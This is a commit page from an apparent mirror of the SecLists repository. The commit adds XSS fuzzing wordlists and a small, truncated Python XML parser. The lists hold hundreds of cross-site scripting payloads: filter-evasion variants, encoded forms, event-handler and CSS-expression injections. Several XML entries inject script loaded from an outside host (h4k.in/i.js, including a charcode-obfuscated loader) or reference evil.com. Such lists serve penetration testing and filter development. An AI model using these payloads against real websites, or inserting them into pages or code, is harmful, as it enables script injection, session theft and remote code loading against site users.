sync/SecLists
1
0
Fork 0
mirror of https://github.com/danielmiessler/SecLists.git synced 2025-04-28 01:36:29 -04:00
Code Issues Projects Releases Packages Wiki Activity Actions 2

duplicated files

Browse source
This commit is contained in:
Mo Langning 2024-02-14 12:24:12 +00:00
parent 9c8ce30b42
commit d0b72e7e31
12 changed files with 11585 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

4
.bin/README.md
View file

@ -13,3 +13,7 @@ e.g. target dir is `Passwords/Common-Credentials` and suffix is `-without-curse-
`os-names-mutate.py` mutates `Fuzzing/os-names.txt` to include possible mutations of OS names in a url.
By default this script outputs the results in `Fuzzing/os-names-mutated.txt`
- - -
`xml-parser.py` parses xml files given as arguments and extracts hardcoded tags. It's meant to be modified as per file basis as every xml file format is unique.

18
.bin/xml-parser.py Normal file
View file

@ -0,0 +1,18 @@
#!/usr/bin/python3
import os
import sys
import xml.etree.ElementTree as ET
if not sys.argv[1]:
exit(0)
files=sys.argv[1].split(" ")
for i in files:
if not os.path.isfile(i):
print("[!] %s does not exist!"%(i))
exit(2)
for i in files:
ET

217
Fuzzing/XSS/human-friendly/XSS-EnDe-evation.txt Normal file
View file

@ -0,0 +1,217 @@
# =========================================================================== #
#?
#? NAME
#? xss-evation.txt
#?
#? SYNOPSIS
#?
#? DESCRIPTION
#? List of Cross-site Scriptings (XSS) samples.
#? Empty lines and lines starting with a # are comments and should be
#? ignored. All other lines contain one payload per line.
#?
# HACKER's INFO
# This file used in EnDe's "Load File" menu.
#?
#? VERSION
#? @(#) xss-evation.txt 1.5 13/05/12 10:51:43
#?
#? AUTHOR
#? 10-jun-10 Achim Hoffmann, mailto: EnDe (at) my (dash) stp (dot) net
#?
# =========================================================================== #
#group most-in-one pattern
"'`ʼˈ‘’‚‛“”„‟′″‴‵‶‷﹅﹐"',舧艠︐︑--><script>alert(42)</script>
#group general filter evasion
"'><script>alert('XSS')</script>
"'><script>alert(/XSS/)</script>
"'><script>alert(42)</script>
"'><script>prompt(42)</script>
"'><script>confirm(42)</script>
"'><sCriPt>confirm(42)</sCriPt>
"'><script >confirm(42)</script >
"'><script foo=bar>confirm(42)</script>
"'><\script>confirm(42)</script>
"'><sc\ript>confirm(42)</script>
"'><sc\tript>confirm(42)</script>
"'><script onlyOpera:-)>alert(42)
"'><script /*%00*/>/*%00*/alert(42)/*%00*/</script /*%00*/
"'><script x:href='//evil.com/onlyOpera'>
"'><///script///>alert(42)</script>
"'><///style///>alert(42)</script>
"'><;(24)trela=daolno ;''=e>'=d
"'><;(24)trela=daolno ;''=/e>'=d
"'><isindex action="javas&Tab;cript:alert(42)" type=image>
# real tab
"'><sc ript>confirm(42)</script>
# URL-encoded
"'%3e%3cscript%3econfirm(42)%3c/script%3e
"'%253e%253cscript%253econfirm(42)%253c/script%253e
"'%25253e%25253cscript%25253econfirm(42)%25253c/script%25253e
"'%u3e%u3cscript%u3econfirm(42)%u3c/script%u3e
"'%u003e%u003cscript%u003econfirm(42)%u003c/script%u003e
"'%25u003e%25u003cscript%25u003econfirm(42)%25u003c/script%25u003e
%22%27%3e%3cscript%3econfirm(42)%3c/script%3e
%u22%u27%u3e%u3cscript%u3econfirm(42)%u3c/script%u3e
%u0022%u0027%u003e%u003cscript%u003econfirm(42)%u003c/script%u003e
%2522%2527%253e%253cscript%253econfirm(42)%253c/script%253e
%252522%252527%25253e%25253cscript%25253econfirm(42)%25253c/script%25253e
%25u22%25u27%25u3e%25u3cscript%25u3econfirm(42)%25u3c/script%25u3e
%25u0022%25u0027%25u003e%25u003cscript%25u003econfirm(42)%25u003c/script%25u003e
# Unicode characters
"'><script>\u0061lert(42)</script>
"'ܾܼscriptܾalert(42)ܼܯscriptܾ
"'%07%3e%07%3cscript%07%3ealert(42)%07%3c/script%07%3e
"'%u073e%u073cscript%u073ealert(42)%u073c/script%u073e
%07%22%07%27%07%3e%07%3cscript%07%3ealert(42)%07%3c/script%07%3e
%u0722%u0727%u073e%u073cscript%u073ealert(42)%u073c/script%u073e
"'%2507%253e%2507%253cscript%2507%253ealert(42)%2507%253c/script%2507%253e
"'%25u073e%25u073cscript%25u073ealert(42)%25u073c/script%25u073e
%2507%2522%2507%2527%2507%253e%2507%253cscript%2507%253ealert(42)%2507%253c/script%2507%253e
%25u0722%25u0727%25u073e%25u073cscript%25u073ealert(42)%25u073c/script%25u073e
#group javascript keywords
javascript:alert(42)
javascript:prompt(42)
javascript:confirm(42)
jAvasCript:confirm(42)
jAvas\Cript:confirm(42)
jAvas Cript:confirm(42)
jAvas/* */Cript:confirm(42)
javascript:alert(42)
document
document.
top
top.
top[
eval
eval(
cookie
.cookie
#group HTML event keywords
onerror
onerror=
onclick
onclick=
onmouseover
onmouseover=
onload
onload=
"onerror
"onerror=
"onclick
"onclick=
"onmouseover
"onmouseover=
"onload
"onload=
#group HTML tag attribute keywords
href=
src=
link=
style=
alt=
title=
egal=
"href=
"src=
"link=
"style=
"alt=
"title=
"egal=
#group HTML tag keywords
<a
<a href=
<a alt=42 href=
<a href="javascript:
<a href=" javascript:
<p
<div
<iframe
<index
<layer
<link
<meta
<style
<script
<img src="/" =_=" title="onerror='alert(42)'">
<img src ?notinChrome?\/onerror = alert(42)
<img src ?notinChrome?\/onerror=alert(42)
<img/alt="/"src="/"onerror=alert(42)>
<iframe/src \/\/onload = alert(42)
<iframe/onreadystatechange=alert(42)
<!-- open comment
<!-- complete comment -->
--><!-- close/complete comment -->
<![CDATA[
<![CDATA[ open cdata
<![CDATA[ complete cdata ]]>
]]><![CDATA[ close/complete cdata ]]>
<?xml
<?xml version="1.0">
#group general IE
" value=``
onmouseover=\u0061\u006C\u0065\u0072\u0074('XSS')
onmouseover=\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF14\uFF12\u1450
#group general IE CSS expression injection
<div style="{ left:expression( alert('XSS') ) }">
#group IE CSS expression variants
left:expr/**/ession(alert('XSS'))
left:expr/* */ession(alert('XSS'))
left:e\0078pr\0065ssion(alert('XSS'))
left:\0065\0078pr\0065ssion(alert('XSS'))
left:expr\65ssion(alert('XSS') ))
left:expr\0065ssion(alert('XSS'))
left:expr&#x65;ssion(alert('XSS'))
left:expr&#101;ssion(alert('XSS'))
left:expr&#x0065;ssion(alert('XSS'))
left:\ff45\ff58\ff50\ff52\ff45\ff53\ff53\ff49\ff4f\ff4e(alert('XSS'))
left:&#xff45;&#xff58;&#xff50;&#xff52;&#xff45;&#xff53;&#xff53;&#xff49;&#xff4f;&#xff4e;(alert('XSS'))
left:\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF14\uFF12\u1450
#group IE CSS expression in fullwidth (same as above)
left:(alert('XSS'))
#group IE CSS expression in capital letters
left:EXPR/**/ESSION(alert('XSS'))
left:EXPR/* */ESSION(alert('XSS'))
left:\ff25\ff38\ff30\ff32\ff42\ff53\ff33\ff29\ff2f\ff2e(alert('XSS'))
left:&#xff25;&#xff38;&#xff30;&#xff32;&#xff42;&#xff53;&#xff33;&#xff29;&#xff2f;&#xff2e;(alert('XSS'))
left:(alert('XSS'))
#group IE CSS expression with foreign Unicode letters
left:exp\0280essio\0274(alert('XSS'))
left:exp\0280essio\207f(alert('XSS'))
left:expʀessioɴ(alert('XSS'))
left:expʀessioⁿ(alert('XSS'))
# see http://openmya.hacker.jp/hasegawa/security/expression.txt also
#group Unicode Left/Right Pointing Double Angel Quotation Mark
# improved pattern from: http://jeremiahgrossman.blogspot.com/2009/06/results-unicode-leftright-pointing.html
%u00ABscript%u00BB
&#x3008;script&#x3009;
U%2bFF1CscriptU%2bFF1E
&#x2039;script&#x203A;
&#x2329;script&#x232A;
&#x27E8;script&#x27E9;
#group data: URL
href="data:text/html;charset=utf-8,%3cscript%3econfirm(42);%3c/script%3e" UTF-8 URL-encoded
href="data:text/html;charset=utf-8,%3c%73%63%72%69%70%74%3e%63%6f%6e%66%69%72%6d%28%34%32%29%3b%3c%2f%73%63%72%69%70%74%3e" UTF-8 URL-encoded (all)
href="data:text/html;base64,PHNjcmlwdD5jb25maXJtKDQyKTs8L3NjcmlwdD4=" base64
href="data:text/html;charset=utf-7,+ADw-script+AD4-confirm(42)+ADsAPA-/script+AD4-" UTF-7
href="data:text/html;charset=utf-7,+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAOwBoAGkAcwB0AG8AcgB5AC4AYgBhAGMAawAoACkAOwA8AC8AcwBjAHIAaQBwAHQAPgAKADwAcwBjAHIAaQBwAHQAPgBjAG8AbgBmAGkAcgBtACgANAAyACkAOwA8AC8AcwBjAHIAaQBwAHQAPg-" UTF-7 (all)
href="data:text/html;charset=utf-7,+ADwAcwBjAHIAaQBwAHQAPg-confirm(42)+ADsAPA-/script+AD4-" UTF-7/UTF-8 mix
href="data:text/html;charset=utf-7;base64,K0FEdy1zY3JpcHQrQUQ0LWNvbmZpcm0oNDIpK0FEc0FQQS0vc2NyaXB0K0FENC0=" UTF-7 in base64
href="data: text/html;charset=utf-7;base64,K0FEdy1zY3JpcHQrQUQ0LWNvbmZpcm0oNDIpK0FEc0FQQS0vc2NyaXB0K0FENC0=">obfuscated UTF-7 in base64
href="data:text/html;base64;charset=utf-7,+AFAASABOAGoAYwBtAGwAdwBkAEQANQBqAGIAMgA1AG0AYQBYAEoAdABLAEQAUQB5AEsAVABzADgATAAzAE4AagBjAG0AbAB3AGQARAA0AD0-" base64 in UTF-7
#group PHP
# use of $_SERVER['PHP_SELF']
%22onmouseover%3d'alert(/PHP_SELF/)'%3d%22%3e
%20%22onmouseover%3d'alert(/PHP_SELF/)'%3d%22%3e
<%<!--'%><script>alert(42);</script -->

1287
Fuzzing/XSS/human-friendly/XSS-EnDe-h4k.xml Normal file
View file

File diff suppressed because it is too large Load diff

534
Fuzzing/XSS/human-friendly/XSS-EnDe-mario.xml Normal file
View file

@ -0,0 +1,534 @@
<?xml version="1.0"?>
<!-- from: http://mario.heideri.ch/xss.xml
date: 03-jan-08
minor formal modifications
-->
<xss>
<attack>
<name> --- Reflective XSS Attacks ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>Advanced XSS Locator</name>
<code>&apos;;alert(0)//\&apos;;alert(1)//&quot;;alert(2)//\&quot;;alert(3)//--&gt;&lt;/SCRIPT&gt;&quot;&gt;&apos;&gt;&lt;SCRIPT&gt;alert(4)&lt;/SCRIPT&gt;=&amp;{}&quot;);}alert(6);function xss(){//</code>
<desc>This is a modified version of the XSS Locator from ha.ckers.org</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Advanced XSS Locator for &amp;lt;title&amp;gt;-Injections</name>
<code>&apos;;alert(0)//\&apos;;alert(1)//&quot;;alert(2)//\&quot;;alert(3)//--&gt;&lt;/SCRIPT&gt;&quot;&gt;&apos;&gt;&lt;/title&gt;&lt;SCRIPT&gt;alert(4)&lt;/SCRIPT&gt;=&amp;{&lt;/title&gt;&lt;script&gt;alert(5)&lt;/script&gt;}&quot;);}</code>
<desc>This is a modified version of the XSS Locator from ha.ckers.org</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>HTML Breaking XSS 1 (all quotes)</name>
<code>&apos;&apos;;!--&quot;&lt;script&gt;alert(0);&lt;/script&gt;=&amp;{(alert(1))}</code>
<desc>HTML Breaker - tries to break the attribute injected in</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>HTML Breaking XSS 2 (double quotes)</name>
<code>&quot;&gt;&lt;script&gt;alert(0);&lt;/script&gt;</code>
<desc>HTML Breaker - tries to break the attribute injected in</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>HTML Breaking XSS 3 (single quotes)</name>
<code>&apos;&gt;&lt;script&gt;alert(0);&lt;/script&gt;</code>
<desc>HTML Breaker - tries to break the attribute injected in</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>HTML Breaking XSS 4 (attributes)</name>
<code>&apos;&lt;script&gt;alert(0);&lt;/script&gt;</code>
<desc>HTML Breaker - credits go to Alex</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Semicolon XSS (HTML)</name>
<code>&lt;img src=x onerror=;;alert(1) /&gt;</code>
<desc>HTML Breaker - credits go to Kishor</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Title-breaker</name>
<code>&lt;/title&gt;&lt;script&gt;alert(1)&lt;/script&gt;</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>HTML-breaking XSS for backticked attributes</name>
<code>`&gt; &lt;script&gt;alert(5)&lt;/script&gt;</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Textarea-breaker (onmouseover)</name>
<code>&lt;/textarea&gt;&lt;br&gt;&lt;code onmouseover=a=eval;b=alert;a(b(/g/.source));&gt;MOVE MOUSE OVER THIS AREA&lt;/code&gt;</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Noscrript-breaker (onmouseover)</name>
<code>&lt;/noscript&gt;&lt;br&gt;&lt;code onmouseover=a=eval;b=alert;a(b(/h/.source));&gt;MOVE MOUSE OVER THIS AREA&lt;/code&gt;</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Style-breaker</name>
<code>}&lt;/style&gt;&lt;script&gt;a=eval;b=alert;a(b(/i/.source));&lt;/script&gt;</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name> --- Reflective JS XSS ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>JS Breaking XSS 1</name>
<code>;}alert(0);{</code>
<desc>JS Breaker - tries to break the javascript injected in</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>JS Breaking XSS 2 (string concatination)</name>
<code>&quot;+alert(0)+&quot;</code>
<desc>JS Breaker - tries to break the javascript injected in</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>onerror XSS Injection</name>
<code>xyz onerror=alert(6); </code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>onclick XSS Injection</name>
<code>onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source);</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Plain JS XSS Injection 1</name>
<code>a=eval;b=alert;a(b(8));</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Plain JS XSS Injection 2</name>
<code>a=1;a=eval;b=alert;a(b(11));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>String-breaking JS Injection (single qouted)</name>
<code>&apos;;//%0da=eval;b=alert;a(b(9));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>String-breaking JS Injection (double qouted)</name>
<code>&quot;;//%0da=eval;b=alert;a(b(10));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>String-breaking JS Injection (single qouted)</name>
<code>&apos;};a=eval;b=alert;a(b(13));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>JSON-breaking JS Injection (double qouted)</name>
<code>&quot;};a=eval;b=alert;a(b(12));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>JSON-breaking JS Injection (non-qouted)</name>
<code>1};a=eval;b=alert;a(b(14));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Array-breaking JS Injection (sinlge qouted)</name>
<code>&apos;];a=eval;b=alert;a(b(15));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Array-breaking JS Injection (double qouted)</name>
<code>&quot;];a=eval;b=alert;a(b(16));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Array-breaking JS Injection (non qouted)</name>
<code>1];a=eval;b=alert;a(b(17));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Int-breaking JS Injection (non qouted)</name>
<code>1;a=eval;b=alert;a(b(/c/.source));</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>CRLF-forced JS Injection</name>
<code>%0da=eval;b=alert;a(b(/d/.source));</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>JS Comment breaker</name>
<code>*/a=eval;b=alert;a(b(/e/.source));/*</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name> --- JS Includes ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>Tiny XSS Include 1 (20 characters, FFox only)</name>
<code>&lt;script src=//h4k.in</code>
<desc>Super-tiny inclusion vector - 20 characters length.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Tiny XSS Include 2 (27 characters - all browsers)</name>
<code>&lt;script src=http://h4k.in/&gt;</code>
<desc>Super-tiny inclusion vector for IE, FFox and Opera - 27 characters length. Credits go to kogir.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Tiny XSS Include 3 (30 characters - all browsers)</name>
<code>&lt;script src=//h4k.in&gt;&lt;/script&gt;</code>
<desc>Tiny inclusion vector for IE, FFox and Opera - 30 characters length.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Tiny XSS Include 4 (HTML Breaking)</name>
<code>&quot;&gt;&lt;script src=//h4k.in&gt;&lt;/script&gt;&lt;</code>
<desc>Tiny inclusion vector for IE, FFox and Opera - breaks HTML.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name> --- Fragmented DOM XSS ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>Include Fragment Pt. 1</name>
<code>&lt;scri</code>
<desc>First part of a fragmented inclusion attack vector. Swallows the enclosed HTML.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Include Fragment Pt. 2</name>
<code>pt src=//h4k.in&gt;&lt;</code>
<desc>Second part of a fragmented inclusion attack vector.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Include Fragment Pt. 3</name>
<code>&gt;&lt;/script&gt;</code>
<desc>Third part of a fragmented inclusion attack vector.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name> --- HTML Injection ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>Advanced HTML Injection Locator</name>
<code>&lt;s&gt;000&lt;s&gt;%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e&amp;#60&amp;#115&amp;#62&amp;#51&amp;#51&amp;#51&amp;#60&amp;#47&amp;#115&amp;#62&amp;#x3c&amp;#x73&amp;#x3e&amp;#x34&amp;#x34&amp;#x34&amp;#x3c&amp;#x2f&amp;#x73&amp;#x3e</code>
<desc>HTML injection vector.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>HTML Injection 1 (http://h4k.in/i.js)</name>
<code>&quot;&gt;&lt;script src=http://h4k.in/i.js&gt;&lt;/script&gt;</code>
<desc>HTML injection vector.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>HTML Injection 2 (using JS - http://h4k.in/i.js)</name>
<code>&quot;&gt;&lt;script&gt;a=document.createElement(&apos;script&apos;);a.src=&apos;http://h4k.in/i.js&apos;;document.body.appendChild(a);&lt;/script&gt;</code>
<desc>HTML injection vector.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>HTML Injection 3 (using charcode - http://h4k.in/i.js)</name>
<code>&quot;&gt;&lt;script&gt;eval(String.fromCharCode(97,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,97,46,115,114,99,61,39,104,116,116,112,58,47,47,104,52,107,46,105,110,47,105,46,106,115,39,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,97,41,59))&lt;/script&gt;</code>
<desc>HTML injection vector.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<!-- disabled 03-jan-08
<attack>
<name> ___ SQL Injections ___x</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>Basic SQL Injection 1</name>
<code> 1 OR 1 = 1 </code>
<desc>Very basic SQL Injection vector</desc>
<label>SQL Injection Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Basic SQL Injection 2</name>
<code>1' OR '1'='1</code>
<desc>Another basic SQL Injection vector</desc>
<label>SQL Injection Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Basic SQL Injection 3</name>
<code>1\'1</code>
<desc>Another basic SQL Injection vector</desc>
<label>SQL Injection Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Basic SQL Injection 4</name>
<code>') OR 1 &lt; 2 #</code>
<desc>Another basic SQL Injection vector</desc>
<label>SQL Injection Attacks</label>
<browser/>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
-->
<attack>
<name> --- Browser specific attacks ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>IE VBScript injection</name>
<code>vbscript:Execute(MsgBox(chr(88)&amp;chr(83)&amp;chr(83)))</code>
<desc>This works in IE only - use the PoC Link feature to test for this.</desc>
<label>Browser specific Attacks</label>
<browser>IE</browser>
</attack>
<attack>
<name>IE expression injection</name>
<code>&quot; style=&quot;color: expression(alert(0));&quot; a=&quot;</code>
<desc>This works in IE only - use the PoC Link feature to test for this.</desc>
<label>Browser specific Attacks</label>
<browser>IE</browser>
</attack>
<attack>
<name>IE closing-tag expression injection</name>
<code>&lt;/a style=&quot;&quot;xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')&quot;&gt;</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser>IE</browser>
</attack>
<attack>
<name>IE backticked semicolon injection</name>
<code>&lt;img src=`x` onrerror= ` ;; alert(1) ` /&gt;</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser>IE</browser>
</attack>
<attack>
<name>Mozilla -moz-binding-url injection</name>
<code>&quot; style=&quot;-moz-binding:url(http://h4k.in/mozxss.xml#xss);&quot; a=&quot;</code>
<desc>This works in Gecko browsers only.</desc>
<label>Browser specific Attacks</label>
<browser>Gecko</browser>
</attack>
<attack>
<name>Mozilla -moz-binding-url injection (filter evading)</name>
<code>&quot; sstyle=&quot;foobar&quot;tstyle=&quot;foobar&quot;ystyle=&quot;foobar&quot;lstyle=&quot;foobar&quot;estyle=&quot;foobar&quot;=-moz-binding:url(http://h4k.in/mozxss.xml#xss)&gt;foobar&lt;/b&gt;#xss)&quot; a=&quot;</code>
<desc>This works in Gecko browsers only. Was once used on php.net</desc>
<label>Browser specific Attacks</label>
<browser>Gecko</browser>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name> --- Weird stuff ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>HTTP Reponse Splitting XSS</name>
<code>%0aContent-Type:text/html%0a%0a%3cscript%3ealert(0)%3c/script%3ehttp://www.google.de/</code>
<desc>HTTP response splitting vector with XSS alert</desc>
<label>Weird stuff</label>
<browser></browser>
</attack>
<attack>
<name>Nullbyte XSS</name>
<code>c%00&quot;&quot;&lt;script&gt;alert(0);&lt;/script&gt;</code>
<desc></desc>
<label>Weird stuff</label>
<browser></browser>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name> --- Style injections and hw/fw-encoding attacks ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>BODY{-moz-binding:url(&quot;http://h4k.in/mozxss.xml%23xss&quot;)}</name>
<code>BODY{-moz-binding:url(&quot;http://h4k.in/mozxss.xml%23xss&quot;)}</code>
<desc></desc>
<label>hw/fw injections</label>
<browser/>
</attack>
<attack>
<name>x=alert;x(%26%2340 /finally through!/.source %26%2341);</name>
<code>x=alert;x(%26%2340 /finally through!/.source %26%2341);</code>
<desc></desc>
<label>hw/fw injections</label>
<browser/>
</attack>
<attack>
<name>%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);//</name>
<code>%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);//</code>
<desc></desc>
<label>hw/fw injections</label>
<browser/>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name> --- URL injection ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>http://aa&amp;lt;script&amp;gt;alert(123)&amp;lt;/script&amp;gt;</name>
<code>http://aa&lt;script&gt;alert(123)&lt;/script&gt;</code>
<desc></desc>
<label>URL injection</label>
<browser/>
</attack>
</xss>

1080
Fuzzing/XSS/human-friendly/XSS-EnDe-xssAttacks.xml Normal file
View file

File diff suppressed because it is too large Load diff

2690
Fuzzing/XSS/human-friendly/XSS-payloadbox.txt Normal file
View file

File diff suppressed because it is too large Load diff

164
Fuzzing/XSS/robot-friendly/XSS-EnDe-evation.txt Normal file
View file

@ -0,0 +1,164 @@
"'`ʼˈ‘’‚‛“”„‟′″‴‵‶‷﹅﹐"',舧艠︐︑--><script>alert(42)</script>
"'><script>alert('XSS')</script>
"'><script>alert(/XSS/)</script>
"'><script>alert(42)</script>
"'><script>prompt(42)</script>
"'><script>confirm(42)</script>
"'><sCriPt>confirm(42)</sCriPt>
"'><script >confirm(42)</script >
"'><script foo=bar>confirm(42)</script>
"'><\script>confirm(42)</script>
"'><sc\ript>confirm(42)</script>
"'><sc\tript>confirm(42)</script>
"'><script onlyOpera:-)>alert(42)
"'><script /*%00*/>/*%00*/alert(42)/*%00*/</script /*%00*/
"'><script x:href='//evil.com/onlyOpera'>
"'><///script///>alert(42)</script>
"'><///style///>alert(42)</script>
"'><;(24)trela=daolno ;''=e>'=d
"'><;(24)trela=daolno ;''=/e>'=d
"'><isindex action="javas&Tab;cript:alert(42)" type=image>
"'><sc ript>confirm(42)</script>
"'%3e%3cscript%3econfirm(42)%3c/script%3e
"'%253e%253cscript%253econfirm(42)%253c/script%253e
"'%25253e%25253cscript%25253econfirm(42)%25253c/script%25253e
"'%u3e%u3cscript%u3econfirm(42)%u3c/script%u3e
"'%u003e%u003cscript%u003econfirm(42)%u003c/script%u003e
"'%25u003e%25u003cscript%25u003econfirm(42)%25u003c/script%25u003e
%22%27%3e%3cscript%3econfirm(42)%3c/script%3e
%u22%u27%u3e%u3cscript%u3econfirm(42)%u3c/script%u3e
%u0022%u0027%u003e%u003cscript%u003econfirm(42)%u003c/script%u003e
%2522%2527%253e%253cscript%253econfirm(42)%253c/script%253e
%252522%252527%25253e%25253cscript%25253econfirm(42)%25253c/script%25253e
%25u22%25u27%25u3e%25u3cscript%25u3econfirm(42)%25u3c/script%25u3e
%25u0022%25u0027%25u003e%25u003cscript%25u003econfirm(42)%25u003c/script%25u003e
"'><script>\u0061lert(42)</script>
"'ܾܼscriptܾalert(42)ܼܯscriptܾ
"'%07%3e%07%3cscript%07%3ealert(42)%07%3c/script%07%3e
"'%u073e%u073cscript%u073ealert(42)%u073c/script%u073e
%07%22%07%27%07%3e%07%3cscript%07%3ealert(42)%07%3c/script%07%3e
%u0722%u0727%u073e%u073cscript%u073ealert(42)%u073c/script%u073e
"'%2507%253e%2507%253cscript%2507%253ealert(42)%2507%253c/script%2507%253e
"'%25u073e%25u073cscript%25u073ealert(42)%25u073c/script%25u073e
%2507%2522%2507%2527%2507%253e%2507%253cscript%2507%253ealert(42)%2507%253c/script%2507%253e
%25u0722%25u0727%25u073e%25u073cscript%25u073ealert(42)%25u073c/script%25u073e
javascript:alert(42)
javascript:prompt(42)
javascript:confirm(42)
jAvasCript:confirm(42)
jAvas\Cript:confirm(42)
jAvas Cript:confirm(42)
jAvas/* */Cript:confirm(42)
javascript:alert(42)
document
document.
top
top.
top[
eval
eval(
cookie
.cookie
onerror
onerror=
onclick
onclick=
onmouseover
onmouseover=
onload
onload=
"onerror
"onerror=
"onclick
"onclick=
"onmouseover
"onmouseover=
"onload
"onload=
href=
src=
link=
style=
alt=
title=
egal=
"href=
"src=
"link=
"style=
"alt=
"title=
"egal=
<a
<a href=
<a alt=42 href=
<a href="javascript:
<a href=" javascript:
<p
<div
<iframe
<index
<layer
<link
<meta
<style
<script
<img src="/" =_=" title="onerror='alert(42)'">
<img src ?notinChrome?\/onerror = alert(42)
<img src ?notinChrome?\/onerror=alert(42)
<img/alt="/"src="/"onerror=alert(42)>
<iframe/src \/\/onload = alert(42)
